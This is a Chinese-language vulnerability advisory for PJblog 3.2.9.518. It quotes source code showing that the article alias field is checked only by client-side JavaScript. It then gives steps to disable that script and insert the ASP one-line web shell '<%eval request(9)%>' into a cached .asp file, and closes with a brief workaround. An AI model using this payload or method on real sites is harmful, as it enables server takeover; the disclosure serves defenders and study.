版本:PJblog 3.2.9.518(2012/5/9日時(shí)為最新版本)
漏洞利用條件:
1����、使用全靜態(tài)模式(默認(rèn)情況是全靜態(tài)模式)
2、用戶可以發(fā)帖(默認(rèn)普通用戶不能發(fā)帖���,所以有點(diǎn)雞肋)
漏洞描述:PJblog 3.2.9.518使用js過濾特殊字符�,在使用全靜態(tài)模式下���,普通用戶發(fā)帖即可插入asp一句話木馬���。
PJblog 3.2.9.518的安全還是非常不錯(cuò),密碼采用了sha1(pass+salt)方式���,salt為6位����,在這樣的情況下����,對(duì)注入還是非常有效,即使拿到密碼也很難破解�����。
class/cls_logAction.asp部分代碼如下:
<%
Class logArticle
………………省略………………
outIndex = outIndex & "[""A"";"&AListC&";("&clearT(AList)&")] " & Chr(13)
outIndex = outIndex & "[""G"";"&GListC&";("&clearT(GList)&")] " & Chr(13)
Dim CateKeys, CateItems, CateHKeys, CateHItems
CateKeys = CateDic.Keys
CateItems = CateDic.Items
CateHKeys = CateHDic.Keys
CateHItems = CateHDic.Items
For i = 0 To CateDic.Count -1
outIndex = outIndex & "["""&CateKeys(i)&""";"&CateHItems(i)&";("&clearT(CateItems(i))&")] " & Chr(13)
Next
SaveList = SaveToFile(outIndex, "cache/listCache.asp")
%>
SaveToFile函數(shù)是將outIndex內(nèi)容寫入到cache/listCache.asp中。
blogpost.asp中調(diào)用了 logArticle��,部分代碼如下:
<%
……………………
Set lArticle = New logArticle
lArticle.categoryID = request.Form("log_CateID")
lArticle.logTitle = request.Form("title")
lArticle.logAuthor = memName
lArticle.logEditType = request.Form("log_editType")
lArticle.logIntroCustom = request.Form("log_IntroC")
lArticle.logIntro = request.Form("log_Intro")
lArticle.logWeather = request.Form("log_weather")
lArticle.logLevel = request.Form("log_Level")
lArticle.logCommentOrder = request.Form("log_comorder")
lArticle.logDisableComment = request.Form("log_DisComment")
lArticle.logIsShow = IsShow
lArticle.logIsTop = request.Form("log_IsTop")
lArticle.logIsDraft = request.Form("log_IsDraft")
lArticle.logFrom = request.Form("log_From")
lArticle.logFromURL = request.Form("log_FromURL")
lArticle.logDisableImage = request.Form("log_disImg")
lArticle.logDisableSmile = request.Form("log_DisSM")
lArticle.logDisableURL = request.Form("log_DisURL")
lArticle.logDisableKeyWord = request.Form("log_DisKey")
lArticle.logMessage = request.Form("Message")
lArticle.logTrackback = request.Form("log_Quote")
lArticle.logTags = request.Form("tags")
lArticle.logPubTime = request.Form("PubTime")
lArticle.logPublishTimeType = request.Form("PubTimeType")
If blog_postFile = 2 Then
lArticle.logCname = request.Form("cname")
lArticle.logCtype = request.Form("ctype")
End If
lArticle.logReadpw = pws
lArticle.logPwtips = pwtips
lArticle.logPwtitle = pwtitle
lArticle.logPwcomm = pwcomm
lArticle.logMeta = request.Form("log_Meta")
lArticle.logKeyWords = keyword
lArticle.logDescription = B_description
if request.form("FirstPost") = 1 then
lArticle.isajax = false
lArticle.logIsDraft = false
postLog = lArticle.editLog(request.Form("postbackId"))
else
lArticle.isajax = false
postLog = lArticle.postLog
end if
Set lArticle = Nothing
%>
lArticle.logCname = request.Form(“cname”)��,并沒有過濾”<%” 和”%>”
漏洞利用方法:
1����、用戶登陸,發(fā)表文章�����,如下圖:
2�、禁止本地js,必須要使用這步�����,否則你無法輸入’<’和’>’���,因?yàn)樽髡咭呀?jīng)考慮到安全問題�����,調(diào)用common.js本地過濾�����,
common/common.js 部份內(nèi)容如下:
1
//創(chuàng)建文件夾規(guī)則 example:
2
//<input onblur="ReplaceInput(this,window.event)" onkeyup="ReplaceInput(this,window.event)" />
3
function ReplaceInput(obj, cevent){
4
var str = ["<", ">", "/", "\\", ":", "*", "?", "|", "\"", /[\u4E00-\u9FA5]/g];
5
if(cevent.keyCode != 37 && cevent.keyCode != 39){
6
//obj.value = obj.value.replace(/[\u4E00-\u9FA5]/g,'');
7
for (var i = 0 ; i < str.length ; i++){
8
obj.value = obj.value.replace(str[i], "");
9
}
10
}
11
}
3��、在別名處插入<%eval request(9)%>�,提交后�����,即可在cache/listCache.asp中會(huì)寫入一句話木馬�����,密碼為9
臨時(shí)解決方案��,禁止普通用戶發(fā)帖�����,
渝公網(wǎng)安備 50024202000196號(hào)
域名注冊(cè)知識(shí)
虛擬主機(jī)知識(shí)
網(wǎng)站建設(shè)知識(shí)
網(wǎng)絡(luò)推廣知識(shí)
網(wǎng)絡(luò)營銷知識(shí)
常見技術(shù)問題
QQ空間
新浪微博
開心網(wǎng)
人人網(wǎng)